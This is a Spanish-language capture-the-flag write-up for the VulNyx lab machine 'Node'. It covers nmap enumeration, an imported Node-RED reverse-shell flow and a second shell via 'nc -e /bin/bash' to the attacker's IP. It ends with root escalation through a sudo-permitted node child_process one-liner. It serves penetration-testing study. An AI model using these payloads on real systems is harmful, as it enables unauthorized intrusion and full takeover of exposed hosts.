cd ~/blog

~/writeups/vulnyx/18-node.md

18 - Node

low Linux vulnyx 18-08-2024
Node-RED flow RCEsudo node Privesc
vulnyx.com

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.69
 nmap -sCV -p 22,80,1880 -oN 02-targeted.txt 192.168.1.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 17:25 -04
Nmap scan report for 192.168.1.69
Host is up (0.00028s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
1880/tcp open  http    Node.js Express framework
|_http-title: Node-RED
|_http-cors: GET POST PUT DELETE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.84 seconds

El puerto 1880 expone Node-RED, una herramienta de programación basada en flujos. Al estar el editor accesible sin autenticación, podemos importar un flujo malicioso que ejecute comandos. Usamos la reverse shell de valkyrix/Node-Red-Reverse-Shell, apuntando a nuestra IP y puerto:

[{"id":"7235b2e6.4cdb9c","type":"tab","label":"Flow 1"},{"id":"d03f1ac0.886c28","type":"tcp out","z":"7235b2e6.4cdb9c","host":"","port":"","beserver":"reply","base64":false,"end":false,"name":"","x":786,"y":350,"wires":[]},{"id":"c14a4b00.271d28","type":"tcp in","z":"7235b2e6.4cdb9c","name":"","server":"client","host":"192.168.1.5","port":"1234","datamode":"stream","datatype":"buffer","newline":"","topic":"","base64":false,"x":281,"y":337,"wires":[["4750d7cd.3c6e88"]]},{"id":"4750d7cd.3c6e88","type":"exec","z":"7235b2e6.4cdb9c","command":"","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":517,"y":362.5,"wires":[["d03f1ac0.886c28"],["d03f1ac0.886c28"],["d03f1ac0.886c28"]]}]

Nos ponemos a la escucha y hacemos clic en deploy:

 ncat -nlvp 1234
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.69:37994.
whoami
dev

La shell tiene ciertas restricciones, así que lanzamos una segunda reverse shell más cómoda:

[object Object]nc -e /bin/bash 192.168.1.5 4321

 ncat -nlvp 4321
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4321
Ncat: Listening on 0.0.0.0:4321
Ncat: Connection from 192.168.1.69:51416.
script /dev/null -c bash
Script iniciado, el fichero de anotación de salida es '/dev/null'.
dev@node:~$

Obtenemos una shell interactiva como dev y la primera flag.

Para escalar privilegios, revisamos los permisos sudo:

dev@node:~$ sudo -l
Matching Defaults entries for dev on node:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dev may run the following commands on node:
    (root) NOPASSWD: /usr/bin/node

Podemos ejecutar node como root. Aprovechamos child_process.spawn para lanzar una shell de root heredando la terminal:

dev@node:~$ sudo -u root node -e 'require("child_process").spawn("/bin/bash", {stdio: [0, 1, 2]})'
root@node:/home/dev#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados